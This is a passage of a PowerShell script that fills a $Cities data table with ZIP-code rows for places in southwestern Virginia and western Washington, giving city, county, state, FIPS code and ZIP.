$Cities.Rows.Add("Austinville","Carroll","Virginia","VA","51","24312") + $null = $Cities.Rows.Add("Barren springs","Wythe","Virginia","VA","51","24313") + $null = $Cities.Rows.Add("Bastian","Bland","Virginia","VA","51","24314") + $null = $Cities.Rows.Add("Bland","Bland","Virginia","VA","51","24315") + $null = $Cities.Rows.Add("Broadford","Tazewell","Virginia","VA","51","24316") + $null = $Cities.Rows.Add("Cana","Carroll","Virginia","VA","51","24317") + $null = $Cities.Rows.Add("Ceres","Bland","Virginia","VA","51","24318") + $null = $Cities.Rows.Add("Chilhowie","Smyth","Virginia","VA","51","24319") + $null = $Cities.Rows.Add("Cripple creek","Wythe","Virginia","VA","51","24322") + $null = $Cities.Rows.Add("Crockett","Wythe","Virginia","VA","51","24323") + $null = $Cities.Rows.Add("Draper","Pulaski","Virginia","VA","51","24324") + $null = $Cities.Rows.Add("Dugspur","Carroll","Virginia","VA","51","24325") + $null = $Cities.Rows.Add("Elk creek","Grayson","Virginia","VA","51","24326") + $null = $Cities.Rows.Add("Emory","Washington","Virginia","VA","51","24327") + $null = $Cities.Rows.Add("Fancy gap","Carroll","Virginia","VA","51","24328") + $null = $Cities.Rows.Add("Fries","Grayson","Virginia","VA","51","24330") + $null = $Cities.Rows.Add("Galax","Galax city","Virginia","VA","51","24333") + $null = $Cities.Rows.Add("Glade spring","Washington","Virginia","VA","51","24340") + $null = $Cities.Rows.Add("Hillsville","Carroll","Virginia","VA","51","24343") + $null = $Cities.Rows.Add("Allisonia","Pulaski","Virginia","VA","51","24347") + $null = $Cities.Rows.Add("Independence","Grayson","Virginia","VA","51","24348") + $null = $Cities.Rows.Add("Ivanhoe","Wythe","Virginia","VA","51","24350") + $null = $Cities.Rows.Add("Lambsburg","Carroll","Virginia","VA","51","24351") + $null = $Cities.Rows.Add("Laurel fork","Carroll","Virginia","VA","51","24352") + $null = $Cities.Rows.Add("Marion","Smyth","Virginia","VA","51","24354") + $null = $Cities.Rows.Add("Foster falls","Wythe","Virginia","VA","51","24360") + $null = $Cities.Rows.Add("Meadowview","Washington","Virginia","VA","51","24361") + $null = $Cities.Rows.Add("Mouth of wilson","Grayson","Virginia","VA","51","24363") + $null = $Cities.Rows.Add("Rocky gap","Bland","Virginia","VA","51","24366") + $null = $Cities.Rows.Add("Rural retreat","Wythe","Virginia","VA","51","24368") + $null = $Cities.Rows.Add("Saltville","Smyth","Virginia","VA","51","24370") + $null = $Cities.Rows.Add("Speedwell","Wythe","Virginia","VA","51","24374") + $null = $Cities.Rows.Add("Sugar grove","Smyth","Virginia","VA","51","24375") + $null = $Cities.Rows.Add("Tannersville","Tazewell","Virginia","VA","51","24377") + $null = $Cities.Rows.Add("Trout dale","Grayson","Virginia","VA","51","24378") + $null = $Cities.Rows.Add("Willis","Floyd","Virginia","VA","51","24380") + $null = $Cities.Rows.Add("Woodlawn","Carroll","Virginia","VA","51","24381") + $null = $Cities.Rows.Add("Wytheville","Wythe","Virginia","VA","51","24382") + $null = $Cities.Rows.Add("Zcta 243hh","Carroll","Virginia","VA","51","243HH") + $null = $Cities.Rows.Add("Woodrum","Staunton city","Virginia","VA","51","24401") + $null = $Cities.Rows.Add("Bacova","Bath","Virginia","VA","51","24412") + $null = $Cities.Rows.Add("Blue grass","Highland","Virginia","VA","51","24413") + $null = $Cities.Rows.Add("Brownsburg","Rockbridge","Virginia","VA","51","24415") + $null = $Cities.Rows.Add("Buena vista","Buena Vista city","Virginia","VA","51","24416") + $null = $Cities.Rows.Add("Churchville","Augusta","Virginia","VA","51","24421") + $null = $Cities.Rows.Add("Clifton forge","Clifton Forge city","Virginia","VA","51","24422") + $null = $Cities.Rows.Add("Alleghany","Alleghany","Virginia","VA","51","24426") + $null = $Cities.Rows.Add("Craigsville","Augusta","Virginia","VA","51","24430") + $null = $Cities.Rows.Add("Crimora","Augusta","Virginia","VA","51","24431") + $null = $Cities.Rows.Add("Deerfield","Augusta","Virginia","VA","51","24432") + $null = $Cities.Rows.Add("Doe hill","Highland","Virginia","VA","51","24433") + $null = $Cities.Rows.Add("Fairfield","Rockbridge","Virginia","VA","51","24435") + $null = $Cities.Rows.Add("Fort defiance","Augusta","Virginia","VA","51","24437") + $null = $Cities.Rows.Add("Goshen","Rockbridge","Virginia","VA","51","24439") + $null = $Cities.Rows.Add("Greenville","Augusta","Virginia","VA","51","24440") + $null = $Cities.Rows.Add("Grottoes","Rockingham","Virginia","VA","51","24441") + $null = $Cities.Rows.Add("Head waters","Highland","Virginia","VA","51","24442") + $null = $Cities.Rows.Add("Hot springs","Bath","Virginia","VA","51","24445") + $null = $Cities.Rows.Add("Iron gate","Alleghany","Virginia","VA","51","24448") + $null = $Cities.Rows.Add("Lexington","Rockbridge","Virginia","VA","51","24450") + $null = $Cities.Rows.Add("Low moor","Alleghany","Virginia","VA","51","24457") + $null = $Cities.Rows.Add("Mc dowell","Highland","Virginia","VA","51","24458") + $null = $Cities.Rows.Add("Middlebrook","Augusta","Virginia","VA","51","24459") + $null = $Cities.Rows.Add("Millboro spring","Bath","Virginia","VA","51","24460") + $null = $Cities.Rows.Add("Mint spring","Augusta","Virginia","VA","51","24463") + $null = $Cities.Rows.Add("Montebello","Nelson","Virginia","VA","51","24464") + $null = $Cities.Rows.Add("Monterey","Highland","Virginia","VA","51","24465") + $null = $Cities.Rows.Add("Mount sidney","Augusta","Virginia","VA","51","24467") + $null = $Cities.Rows.Add("Port republic","Rockingham","Virginia","VA","51","24471") + $null = $Cities.Rows.Add("Raphine","Rockbridge","Virginia","VA","51","24472") + $null = $Cities.Rows.Add("Rockbridge baths","Rockbridge","Virginia","VA","51","24473") + $null = $Cities.Rows.Add("Selma","Alleghany","Virginia","VA","51","24474") + $null = $Cities.Rows.Add("Spottswood","Augusta","Virginia","VA","51","24475") + $null = $Cities.Rows.Add("Stuarts draft","Augusta","Virginia","VA","51","24477") + $null = $Cities.Rows.Add("Swoope","Augusta","Virginia","VA","51","24479") + $null = $Cities.Rows.Add("Verona","Augusta","Virginia","VA","51","24482") + $null = $Cities.Rows.Add("Vesuvius","Rockbridge","Virginia","VA","51","24483") + $null = $Cities.Rows.Add("Bolar","Bath","Virginia","VA","51","24484") + $null = $Cities.Rows.Add("West augusta","Augusta","Virginia","VA","51","24485") + $null = $Cities.Rows.Add("Weyers cave","Augusta","Virginia","VA","51","24486") + $null = $Cities.Rows.Add("Burnsville","Bath","Virginia","VA","51","24487") + $null = $Cities.Rows.Add("Zcta 244hh","Alleghany","Virginia","VA","51","244HH") + $null = $Cities.Rows.Add("Zcta 244xx","Rockingham","Virginia","VA","51","244XX") + $null = $Cities.Rows.Add("Lynchburg","Lynchburg city","Virginia","VA","51","24501") + $null = $Cities.Rows.Add("Timberlake","Lynchburg city","Virginia","VA","51","24502") + $null = $Cities.Rows.Add("Lynchburg","Lynchburg city","Virginia","VA","51","24503") + $null = $Cities.Rows.Add("Lynchburg","Lynchburg city","Virginia","VA","51","24504") + $null = $Cities.Rows.Add("Altavista","Campbell","Virginia","VA","51","24517") + $null = $Cities.Rows.Add("Alton","Halifax","Virginia","VA","51","24520") + $null = $Cities.Rows.Add("Amherst","Amherst","Virginia","VA","51","24521") + $null = $Cities.Rows.Add("Appomattox","Appomattox","Virginia","VA","51","24522") + $null = $Cities.Rows.Add("Bedford","Bedford","Virginia","VA","51","24523") + $null = $Cities.Rows.Add("Big island","Bedford","Virginia","VA","51","24526") + $null = $Cities.Rows.Add("Blairs","Pittsylvania","Virginia","VA","51","24527") + $null = $Cities.Rows.Add("Brookneal","Campbell","Virginia","VA","51","24528") + $null = $Cities.Rows.Add("Buffalo junction","Mecklenburg","Virginia","VA","51","24529") + $null = $Cities.Rows.Add("Callands","Pittsylvania","Virginia","VA","51","24530") + $null = $Cities.Rows.Add("Chatham","Pittsylvania","Virginia","VA","51","24531") + $null = $Cities.Rows.Add("Clifford","Amherst","Virginia","VA","51","24533") + $null = $Cities.Rows.Add("Clover","Halifax","Virginia","VA","51","24534") + $null = $Cities.Rows.Add("Coleman falls","Bedford","Virginia","VA","51","24536") + $null = $Cities.Rows.Add("Concord","Campbell","Virginia","VA","51","24538") + $null = $Cities.Rows.Add("Crystal hill","Halifax","Virginia","VA","51","24539") + $null = $Cities.Rows.Add("Danville","Danville city","Virginia","VA","51","24540") + $null = $Cities.Rows.Add("Danville","Danville city","Virginia","VA","51","24541") + $null = $Cities.Rows.Add("Dry fork","Pittsylvania","Virginia","VA","51","24549") + $null = $Cities.Rows.Add("Evington","Campbell","Virginia","VA","51","24550") + $null = $Cities.Rows.Add("Forest","Bedford","Virginia","VA","51","24551") + $null = $Cities.Rows.Add("Gladstone","Nelson","Virginia","VA","51","24553") + $null = $Cities.Rows.Add("Gladys","Campbell","Virginia","VA","51","24554") + $null = $Cities.Rows.Add("Glasgow","Rockbridge","Virginia","VA","51","24555") + $null = $Cities.Rows.Add("Goode","Bedford","Virginia","VA","51","24556") + $null = $Cities.Rows.Add("Gretna","Pittsylvania","Virginia","VA","51","24557") + $null = $Cities.Rows.Add("Halifax","Halifax","Virginia","VA","51","24558") + $null = $Cities.Rows.Add("Howardsville","Buckingham","Virginia","VA","51","24562") + $null = $Cities.Rows.Add("Hurt","Pittsylvania","Virginia","VA","51","24563") + $null = $Cities.Rows.Add("Java","Pittsylvania","Virginia","VA","51","24565") + $null = $Cities.Rows.Add("Keeling","Pittsylvania","Virginia","VA","51","24566") + $null = $Cities.Rows.Add("Long island","Pittsylvania","Virginia","VA","51","24569") + $null = $Cities.Rows.Add("Lynch station","Campbell","Virginia","VA","51","24571") + $null = $Cities.Rows.Add("Madison heights","Amherst","Virginia","VA","51","24572") + $null = $Cities.Rows.Add("Monroe","Amherst","Virginia","VA","51","24574") + $null = $Cities.Rows.Add("Lennig","Halifax","Virginia","VA","51","24577") + $null = $Cities.Rows.Add("Natural bridge","Rockbridge","Virginia","VA","51","24578") + $null = $Cities.Rows.Add("Natural bridge s","Rockbridge","Virginia","VA","51","24579") + $null = $Cities.Rows.Add("Nelson","Mecklenburg","Virginia","VA","51","24580") + $null = $Cities.Rows.Add("Norwood","Nelson","Virginia","VA","51","24581") + $null = $Cities.Rows.Add("Ringgold","Pittsylvania","Virginia","VA","51","24586") + $null = $Cities.Rows.Add("Rustburg","Campbell","Virginia","VA","51","24588") + $null = $Cities.Rows.Add("Scottsburg","Halifax","Virginia","VA","51","24589") + $null = $Cities.Rows.Add("Scottsville","Albemarle","Virginia","VA","51","24590") + $null = $Cities.Rows.Add("South boston","Halifax","Virginia","VA","51","24592") + $null = $Cities.Rows.Add("Spout spring","Appomattox","Virginia","VA","51","24593") + $null = $Cities.Rows.Add("Sutherlin","Pittsylvania","Virginia","VA","51","24594") + $null = $Cities.Rows.Add("Sweet briar","Amherst","Virginia","VA","51","24595") + $null = $Cities.Rows.Add("Ingram","Halifax","Virginia","VA","51","24597") + $null = $Cities.Rows.Add("Virgilina","Halifax","Virginia","VA","51","24598") + $null = $Cities.Rows.Add("Wingina","Nelson","Virginia","VA","51","24599") + $null = $Cities.Rows.Add("Zcta 245hh","Albemarle","Virginia","VA","51","245HH") + $null = $Cities.Rows.Add("Amonate","Tazewell","Virginia","VA","51","24601") + $null = $Cities.Rows.Add("Bandy","Tazewell","Virginia","VA","51","24602") + $null = $Cities.Rows.Add("Conaway","Buchanan","Virginia","VA","51","24603") + $null = $Cities.Rows.Add("Bishop","Tazewell","Virginia","VA","51","24604") + $null = $Cities.Rows.Add("Bluefield","Tazewell","Virginia","VA","51","24605") + $null = $Cities.Rows.Add("Boissevain","Tazewell","Virginia","VA","51","24606") + $null = $Cities.Rows.Add("Breaks","Buchanan","Virginia","VA","51","24607") + $null = $Cities.Rows.Add("Cedar bluff","Tazewell","Virginia","VA","51","24609") + $null = $Cities.Rows.Add("Doran","Tazewell","Virginia","VA","51","24612") + $null = $Cities.Rows.Add("Falls mills","Tazewell","Virginia","VA","51","24613") + $null = $Cities.Rows.Add("Grundy","Buchanan","Virginia","VA","51","24614") + $null = $Cities.Rows.Add("Hurley","Buchanan","Virginia","VA","51","24620") + $null = $Cities.Rows.Add("Jewell valley","Tazewell","Virginia","VA","51","24622") + $null = $Cities.Rows.Add("Keen mountain","Buchanan","Virginia","VA","51","24624") + $null = $Cities.Rows.Add("Maxie","Buchanan","Virginia","VA","51","24628") + $null = $Cities.Rows.Add("Tiptop","Tazewell","Virginia","VA","51","24630") + $null = $Cities.Rows.Add("Patterson","Buchanan","Virginia","VA","51","24631") + $null = $Cities.Rows.Add("Pilgrims knob","Buchanan","Virginia","VA","51","24634") + $null = $Cities.Rows.Add("Pocahontas","Tazewell","Virginia","VA","51","24635") + $null = $Cities.Rows.Add("Pounding mill","Tazewell","Virginia","VA","51","24637") + $null = $Cities.Rows.Add("Raven","Tazewell","Virginia","VA","51","24639") + $null = $Cities.Rows.Add("Richlands","Tazewell","Virginia","VA","51","24641") + $null = $Cities.Rows.Add("Rowe","Buchanan","Virginia","VA","51","24646") + $null = $Cities.Rows.Add("Swords creek","Russell","Virginia","VA","51","24649") + $null = $Cities.Rows.Add("Tazewell","Tazewell","Virginia","VA","51","24651") + $null = $Cities.Rows.Add("Vansant","Buchanan","Virginia","VA","51","24656") + $null = $Cities.Rows.Add("Whitewood","Buchanan","Virginia","VA","51","24657") + $null = $Cities.Rows.Add("","Scott","Virginia","VA","51","37642") + $null = $Cities.Rows.Add("Algona","King","Washington","WA","53","98001") + $null = $Cities.Rows.Add("Auburn","King","Washington","WA","53","98002") + $null = $Cities.Rows.Add("Federal way","King","Washington","WA","53","98003") + $null = $Cities.Rows.Add("Beaux arts","King","Washington","WA","53","98004") + $null = $Cities.Rows.Add("Bellevue","King","Washington","WA","53","98005") + $null = $Cities.Rows.Add("Bellevue","King","Washington","WA","53","98006") + $null = $Cities.Rows.Add("Bellevue","King","Washington","WA","53","98007") + $null = $Cities.Rows.Add("Bellevue","King","Washington","WA","53","98008") + $null = $Cities.Rows.Add("Black diamond","King","Washington","WA","53","98010") + $null = $Cities.Rows.Add("Bothell","King","Washington","WA","53","98011") + $null = $Cities.Rows.Add("Mill creek","Snohomish","Washington","WA","53","98012") + $null = $Cities.Rows.Add("Carnation","King","Washington","WA","53","98014") + $null = $Cities.Rows.Add("Duvall","King","Washington","WA","53","98019") + $null = $Cities.Rows.Add("Woodway","Snohomish","Washington","WA","53","98020") + $null = $Cities.Rows.Add("Bothell","Snohomish","Washington","WA","53","98021") + $null = $Cities.Rows.Add("Enumclaw","King","Washington","WA","53","98022") + $null = $Cities.Rows.Add("Federal way","King","Washington","WA","53","98023") + $null = $Cities.Rows.Add("Fall city","King","Washington","WA","53","98024") + $null = $Cities.Rows.Add("Hobart","King","Washington","WA","53","98025") + $null = $Cities.Rows.Add("Edmonds","Snohomish","Washington","WA","53","98026") + $null = $Cities.Rows.Add("Issaquah","King","Washington","WA","53","98027") + $null = $Cities.Rows.Add("Kenmore","King","Washington","WA","53","98028") + $null = $Cities.Rows.Add("Zcta 98029","King","Washington","WA","53","98029") + $null = $Cities.Rows.Add("Kent","King","Washington","WA","53","98031") + $null = $Cities.Rows.Add("Kent","King","Washington","WA","53","98032") + $null = $Cities.Rows.Add("Kirkland","King","Washington","WA","53","98033") + $null = $Cities.Rows.Add("Kirkland","King","Washington","WA","53","98034") + $null = $Cities.Rows.Add("Brier","Snohomish","Washington","WA","53","98036") + $null = $Cities.Rows.Add("Lynnwood","Snohomish","Washington","WA","53","98037") + $null = $Cities.Rows.Add("Maple valley","King","Washington","WA","53","98038") + $null = $Cities.Rows.Add("Medina","King","Washington","WA","53","98039") + $null = $Cities.Rows.Add("Mercer island","King","Washington","WA","53","98040") + $null = $Cities.Rows.Add("Kent","King","Washington","WA","53","98042") + $null = $Cities.Rows.Add("Mountlake terrac","Snohomish","Washington","WA","53","98043") + $null = $Cities.Rows.Add("North bend","King","Washington","WA","53","98045") + $null = $Cities.Rows.Add("Pacific","King","Washington","WA","53","98047") + $null = $Cities.Rows.Add("Ravensdale","King","Washington","WA","53","98051") + $null = $Cities.Rows.Add("Redmond","King","Washington","WA","53","98052") + $null = $Cities.Rows.Add("Redmond","King","Washington","WA","53","98053") + $null = $Cities.Rows.Add("Renton","King","Washington","WA","53","98055") + $null = $Cities.Rows.Add("Renton","King","Washington","WA","53","98056") + $null = $Cities.Rows.Add("Renton","King","Washington","WA","53","98058") + $null = $Cities.Rows.Add("Renton","King","Washington","WA","53","98059") + $null = $Cities.Rows.Add("Snoqualmie","King","Washington","WA","53","98065") + $null = $Cities.Rows.Add("Snoqualmie pass","Kittitas","Washington","WA","53","98068") + $null = $Cities.Rows.Add("Vashon","King","Washington","WA","53","98070") + $null = $Cities.Rows.Add("Woodinville","King","Washington","WA","53","98072") + $null = $Cities.Rows.Add("Zcta 98092","King","Washington","WA","53","98092") + $null = $Cities.Rows.Add("Zcta 980hh","King","Washington","WA","53","980HH") + $null = $Cities.Rows.Add("Zcta 980xx","King","Washington","WA","53","980XX") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98101") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98102") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98103") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98104") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98105") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98106") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98107") + $null = $Cities.Rows.Add("Tukwila","King","Washington","WA","53","98108") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98109") + $null = $Cities.Rows.Add("Bainbridge islan","Kitsap","Washington","WA","53","98110") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98112") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98115") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98116") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98117") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98118") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98119") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98121") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98122") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98125") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98126") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98133") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98134") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98136") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98144") + $null = $Cities.Rows.Add("Burien","King","Washington","WA","53","98146") + $null = $Cities.Rows.Add("Normandy park","King","Washington","WA","53","98148") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98154") + $null = $Cities.Rows.Add("Lk forest park","King","Washington","WA","53","98155") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98164") + $null = $Cities.Rows.Add("Normandy park","King","Washington","WA","53","98166") + $null = $Cities.Rows.Add("Tukwila","King","Washington","WA","53","98168") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98174") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98177") + $null = $Cities.Rows.Add("Tukwila","King","Washington","WA","53","98178") + $null = $Cities.Rows.Add("Tukwila","King","Washington","WA","53","98188") + $null = $Cities.Rows.Add("Des moines","King","Washington","WA","53","98198") + $null = $Cities.Rows.Add("Seattle","King","Washington","WA","53","98199") + $null = $Cities.Rows.Add("Zcta 981hh","King","Washington","WA","53","981HH") + $null = $Cities.Rows.Add("Everett","Snohomish","Washington","WA","53","98201") + $null = $Cities.Rows.Add("Everett","Snohomish","Washington","WA","53","98203") + $null = $Cities.Rows.Add("Everett","Snohomish","Washington","WA","53","98204") + $null = $Cities.Rows.Add("Everett","Snohomish","Washington","WA","53","98205") + $null = $Cities.Rows.Add("Everett","Snohomish","Washington","WA","53","98208") + $null = $Cities.Rows.Add("Acme","Whatcom","Washington","WA","53","98220") + $null = $Cities.Rows.Add("Anacortes","Skagit","Washington","WA","53","98221") + $null = $Cities.Rows.Add("Blakely island","San Juan","Washington","WA","53","98222") + $null = $Cities.Rows.Add("Arlington","Snohomish","Washington","WA","53","98223") + $null = $Cities.Rows.Add("Baring","King","Washington","WA","53","98224") + $null = $Cities.Rows.Add("Bellingham","Whatcom","Washington","WA","53","98225") + $null = $Cities.Rows.Add("Bellingham","Whatcom","Washington","WA","53","98226") + $null = $Cities.Rows.Add("Blaine","Whatcom","Washington","WA","53","98230") + $null = $Cities.Rows.Add("Bow","Skagit","Washington","WA","53","98232") + $null = $Cities.Rows.Add("Burlington","Skagit","Washington","WA","53","98233") + $null = $Cities.Rows.Add("Clearlake","Skagit","Washington","WA","53","98235") + $null = $Cities.Rows.Add("Clinton","Island","Washington","WA","53","98236") + $null = $Cities.Rows.Add("Concrete","Skagit","Washington","WA","53","98237") + $null = $Cities.Rows.Add("Conway","Skagit","Washington","WA","53","98238") + $null = $Cities.Rows.Add("Coupeville","Island","Washington","WA","53","98239") + $null = $Cities.Rows.Add("Custer","Whatcom","Washington","WA","53","98240") + $null = $Cities.Rows.Add("Darrington","Snohomish","Washington","WA","53","98241") + $null = $Cities.Rows.Add("Deer harbor","San Juan","Washington","WA","53","98243") + $null = $Cities.Rows.Add("Glacier","Whatcom","Washington","WA","53","98244") + $null = $Cities.Rows.Add("Eastsound","San Juan","Washington","WA","53","98245") + $null = $Cities.Rows.Add("Everson","Whatcom","Washington","WA","53","98247") + $null = $Cities.Rows.Add("Ferndale","Whatcom","Washington","WA","53","98248") + $null = $Cities.Rows.Add("Freeland","Island","Washington","WA","53","98249") + $null = $Cities.Rows.Add("Friday harbor","San Juan","Washington","WA","53","98250") + $null = $Cities.Rows.Add("Gold bar","Snohomish","Washington","WA","53","98251") + $null = $Cities.Rows.Add("Granite falls","Snohomish","Washington","WA","53","98252") + $null = $Cities.Rows.Add("Greenbank","Island","Washington","WA","53","98253") + $null = $Cities.Rows.Add("Index","Snohomish","Washington","WA","53","98256") + $null = $Cities.Rows.Add("La conner","Skagit","Washington","WA","53","98257") + $null = $Cities.Rows.Add("Lake stevens","Snohomish","Washington","WA","53","98258") + $null = $Cities.Rows.Add("Langley","Island","Washington","WA","53","98260") + $null = $Cities.Rows.Add("Lopez","San Juan","Washington","WA","53","98261") + $null = $Cities.Rows.Add("Lummi island","Whatcom","Washington","WA","53","98262") + $null = $Cities.Rows.Add("Lynden","Whatcom","Washington","WA","53","98264") + $null = $Cities.Rows.Add("Marblemount","Skagit","Washington","WA","53","98267") + $null = $Cities.Rows.Add("Marysville","Snohomish","Washington","WA","53","98270") + $null = $Cities.Rows.Add("Marysville","Snohomish","Washington","WA","53","98271") + $null = $Cities.Rows.Add("Monroe","Snohomish","Washington","WA","53","98272") + $null = $Cities.Rows.Add("Mount vernon","Skagit","Washington","WA","53","98273") + $null = $Cities.Rows.Add("Zcta 98274","Skagit","Washington","WA","53","98274") + $null = $Cities.Rows.Add("Mukilteo","Snohomish","Washington","WA","53","98275") + $null = $Cities.Rows.Add("Oak harbor","Island","Washington","WA","53","98277") + $null = $Cities.Rows.Add("Olga","San Juan","Washington","WA","53","98279") + $null = $Cities.Rows.Add("Orcas","San Juan","Washington","WA","53","98280") + $null = $Cities.Rows.Add("Point roberts","Whatcom","Washington","WA","53","98281") + $null = $Cities.Rows.Add("Rockport","Skagit","Washington","WA","53","98283") + $null = $Cities.Rows.Add("Sedro woolley","Skagit","Washington","WA","53","98284") + $null = $Cities.Rows.Add("Shaw island","San Juan","Washington","WA","53","98286") + $null = $Cities.Rows.Add("Skykomish","King","Washington","WA","53","98288") + $null = $Cities.Rows.Add("Snohomish","Snohomish","Washington","WA","53","98290") + $null = $Cities.Rows.Add("Stanwood","Snohomish","Washington","WA","53","98292") + $null = $Cities.Rows.Add("Sultan","Snohomish","Washington","WA","53","98294") + $null = $Cities.Rows.Add("Sumas","Whatcom","Washington","WA","53","98295") + $null = $Cities.Rows.Add("Zcta 98296","Snohomish","Washington","WA","53","98296") + $null = $Cities.Rows.Add("Waldron","San Juan","Washington","WA","53","98297") + $null = $Cities.Rows.Add("Zcta 982hh","Island","Washington","WA","53","982HH") + $null = $Cities.Rows.Add("Zcta 982xx","Whatcom","Washington","WA","53","982XX") + $null = $Cities.Rows.Add("Anderson island","Pierce","Washington","WA","53","98303") + $null = $Cities.Rows.Add("Ashford","Pierce","Washington","WA","53","98304") + $null = $Cities.Rows.Add("Beaver","Clallam","Washington","WA","53","98305") + $null = $Cities.Rows.Add("Bremerton","Kitsap","Washington","WA","53","98310") + $null = $Cities.Rows.Add("Bremerton","Kitsap","Washington","WA","53","98311") + $null = $Cities.Rows.Add("Bremerton","Kitsap","Washington","WA","53","98312") + $null = $Cities.Rows.Add("Silverdale","Kitsap","Washington","WA","53","98315") + $null = $Cities.Rows.Add("Brinnon","Jefferson","Washington","WA","53","98320") + $null = $Cities.Rows.Add("Buckley","Pierce","Washington","WA","53","98321") + $null = $Cities.Rows.Add("Carbonado","Pierce","Washington","WA","53","98323") + $null = $Cities.Rows.Add("Chimacum","Jefferson","Washington","WA","53","98325") + $null = $Cities.Rows.Add("Clallam bay","Clallam","Washington","WA","53","98326") + $null = $Cities.Rows.Add("Du pont","Pierce","Washington","WA","53","98327") + $null = $Cities.Rows.Add("Eatonville","Pierce","Washington","WA","53","98328") + $null = $Cities.Rows.Add("Gig harbor","Pierce","Washington","WA","53","98329") + $null = $Cities.Rows.Add("Elbe","Pierce","Washington","WA","53","98330") + $null = $Cities.Rows.Add("Forks","Clallam","Washington","WA","53","98331") + $null = $Cities.Rows.Add("Gig harbor","Pierce","Washington","WA","53","98332") + $null = $Cities.Rows.Add("Fox island","Pierce","Washington","WA","53","98333") + $null = $Cities.Rows.Add("Gig harbor","Pierce","Washington","WA","53","98335") + $null = $Cities.Rows.Add("Glenoma","Lewis","Washington","WA","53","98336") + $null = $Cities.Rows.Add("Gorst","Kitsap","Washington","WA","53","98337") + $null = $Cities.Rows.Add("Graham","Pierce","Washington","WA","53","98338") + $null = $Cities.Rows.Add("Port hadlock","Jefferson","Washington","WA","53","98339") + $null = $Cities.Rows.Add("Hansville","Kitsap","Washington","WA","53","98340") + $null = $Cities.Rows.Add("Indianola","Kitsap","Washington","WA","53","98342") + $null = $Cities.Rows.Add("Keyport","Kitsap","Washington","WA","53","98345") + $null = $Cities.Rows.Add("Kingston","Kitsap","Washington","WA","53","98346") + $null = $Cities.Rows.Add("Home","Pierce","Washington","WA","53","98349") + $null = $Cities.Rows.Add("La push","Clallam","Washington","WA","53","98350") + $null = $Cities.Rows.Add("Longbranch","Pierce","Washington","WA","53","98351") + $null = $Cities.Rows.Add("Manchester","Kitsap","Washington","WA","53","98353") + $null = $Cities.Rows.Add("Milton","Pierce","Washington","WA","53","98354") + $null = $Cities.Rows.Add("Mineral","Lewis","Washington","WA","53","98355") + $null = $Cities.Rows.Add("Morton","Lewis","Washington","WA","53","98356") + $null = $Cities.Rows.Add("Neah bay","Clallam","Washington","WA","53","98357") + $null = $Cities.Rows.Add("Nordland","Jefferson","Washington","WA","53","98358") + $null = $Cities.Rows.Add("Olalla","Kitsap","Washington","WA","53","98359") + $null = $Cities.Rows.Add("Orting","Pierce","Washington","WA","53","98360") + $null = $Cities.Rows.Add("Packwood","Lewis","Washington","WA","53","98361") + $null = $Cities.Rows.Add("Port angeles","Clallam","Washington","WA","53","98362") + $null = $Cities.Rows.Add("Zcta 98363","Clallam","Washington","WA","53","98363") + $null = $Cities.Rows.Add("Port gamble","Kitsap","Washington","WA","53","98364") + $null = $Cities.Rows.Add("Port ludlow","Jefferson","Washington","WA","53","98365") + $null = $Cities.Rows.Add("South park villa","Kitsap","Washington","WA","53","98366") + $null = $Cities.Rows.Add("Zcta 98367","Kitsap","Washington","WA","53","98367") + $null = $Cities.Rows.Add("Port townsend","Jefferson","Washington","WA","53","98368") + $null = $Cities.Rows.Add("Poulsbo","Kitsap","Washington","WA","53","98370") + $null = $Cities.Rows.Add("Puyallup","Pierce","Washington","WA","53","98371") + $null = $Cities.Rows.Add("Puyallup","Pierce","Washington","WA","53","98372") + $null = $Cities.Rows.Add("Puyallup","Pierce","Washington","WA","53","98373") + $null = $Cities.Rows.Add("Puyallup","Pierce","Washington","WA","53","98374") + $null = $Cities.Rows.Add("Zcta 98375","Pierce","Washington","WA","53","98375") + $null = $Cities.Rows.Add("Quilcene","Jefferson","Washington","WA","53","98376") + $null = $Cities.Rows.Add("Randle","Lewis","Washington","WA","53","98377") + $null = $Cities.Rows.Add("Seabeck","Kitsap","Washington","WA","53","98380") + $null = $Cities.Rows.Add("Sekiu","Clallam","Washington","WA","53","98381") + $null = $Cities.Rows.Add("Sequim","Clallam","Washington","WA","53","98382") + $null = $Cities.Rows.Add("Silverdale","Kitsap","Washington","WA","53","98383") + $null = $Cities.Rows.Add("South prairie","Pierce","Washington","WA","53","98385") + $null = $Cities.Rows.Add("Spanaway","Pierce","Washington","WA","53","98387") + $null = $Cities.Rows.Add("Steilacoom","Pierce","Washington","WA","53","98388") + $null = $Cities.Rows.Add("Bonney lake","Pierce","Washington","WA","53","98390") + $null = $Cities.Rows.Add("Suquamish","Kitsap","Washington","WA","53","98392") + $null = $Cities.Rows.Add("Vaughn","Pierce","Washington","WA","53","98394") + $null = $Cities.Rows.Add("Wilkeson","Pierce","Washington","WA","53","98396") + $null = $Cities.Rows.Add("Zcta 983hh","Clallam","Washington","WA","53","983HH") + $null = $Cities.Rows.Add("Zcta 983xx","Jefferson","Washington","WA","53","983XX") + $null = 